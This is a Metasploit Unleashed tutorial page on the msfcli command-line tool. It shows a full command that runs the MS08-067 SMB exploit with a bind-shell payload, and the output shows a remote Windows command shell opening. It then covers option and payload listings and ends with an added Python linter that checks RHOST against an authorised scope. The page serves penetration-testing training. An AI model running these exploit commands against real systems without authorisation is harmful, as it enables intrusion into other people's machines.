Msfcli

From Metasploit Unleashed

Msfcli provides a powerful command-line interface to the framework.

root@bt:~# msfcli -h
Usage: /opt/framework/msf3/msfcli <exploit_name> <option=value> [mode]
======================================================================

    Mode           Description
    ----           -----------
    (A)dvanced     Show available advanced options for this module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
    (H)elp         You're looking at it baby!
    (I)DS Evasion  Show available ids evasion options for this module
    (O)ptions      Show available options for this module
    (P)ayloads     Show available payloads for this module
    (S)ummary      Show information about this module
    (T)argets      Show available targets for this exploit module


Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.

root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.100 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...

 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 775 exploits - 411 auxiliary - 120 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14414 updated today (2011.12.14)

RHOST => 192.168.1.100
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.100
[*] Command shell session 1 opened (192.168.1.5:53482 -> 192.168.1.100:4444) at 2011-12-14 21:13:55 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck.

root@bt:~# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

To display the payloads that are available for the current module, append the letter 'P' to the command-line string.

root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.100 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                                             Description
   ----                                             -----------
   generic/custom                                   Use custom string or file as payload. Set either PAYLOADFILE or
...snip...

The other modes supported by msfcli can be listed by issuing 'msfcli -h'.

Benefits of msfcli

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation


The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.
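
Because msfcli lines are often embedded in scripts, and options are case-sensitive NAME=value pairs followed by a mode letter, a pre-flight check can catch a mistyped option or an out-of-scope RHOST before a script is run. The following is an added example, not code from Metasploit or from the original page; the function names, the known-option set (taken from the 'O' listing above plus PAYLOAD) and the 192.168.1.0/24 lab scope are assumptions.

```python
import ipaddress
import shlex

# Mode letters copied from the 'msfcli -h' table; assumed to be typed as shown.
MODES = {"A", "AC", "C", "E", "H", "I", "O", "P", "S", "T"}

def parse_msfcli(cmdline):
    """Split 'msfcli <module> NAME=value ... [mode]' into its parts."""
    tokens = shlex.split(cmdline)
    if len(tokens) < 2 or tokens[0].rsplit("/", 1)[-1] != "msfcli":
        raise ValueError("not an msfcli command line")
    module, rest = tokens[1], tokens[2:]
    # The mode, when present, is the last token and carries no '='.
    mode = rest.pop() if rest and "=" not in rest[-1] else None
    options = {}
    for tok in rest:
        name, sep, value = tok.partition("=")
        if not sep or not name:
            raise ValueError(f"expected NAME=value, got {tok!r}")
        options[name] = value
    return module, options, mode

def lint(cmdline, known_options, scope):
    """Return a list of problems; an empty list means the line passed."""
    _module, options, mode = parse_msfcli(cmdline)
    problems = []
    if mode is not None and mode not in MODES:
        problems.append(f"unknown mode {mode!r}")
    by_upper = {k.upper(): k for k in known_options}
    for name in options:
        if name not in known_options:  # exact match: options are case-sensitive
            hint = by_upper.get(name.upper())
            problems.append(f"option {name!r} should be {hint!r}" if hint
                            else f"unknown option {name!r}")
    if mode in ("C", "E"):  # check and execute are the modes that run the module
        nets = [ipaddress.ip_network(n) for n in scope]
        try:
            addr = ipaddress.ip_address(options["RHOST"])
            if not any(addr in n for n in nets):
                problems.append(f"RHOST {addr} is outside the authorised scope")
        except (KeyError, ValueError):
            problems.append("RHOST missing or not an IP address")
    return problems

# Constructed inputs: options from the 'O' listing plus PAYLOAD, and a lab scope.
KNOWN = {"RHOST", "RPORT", "SMBPIPE", "PAYLOAD"}
SCOPE = ["192.168.1.0/24"]
if __name__ == "__main__":
    print(lint("msfcli windows/smb/ms08_067_netapi rhost=10.0.0.5 E", KNOWN, SCOPE))
```
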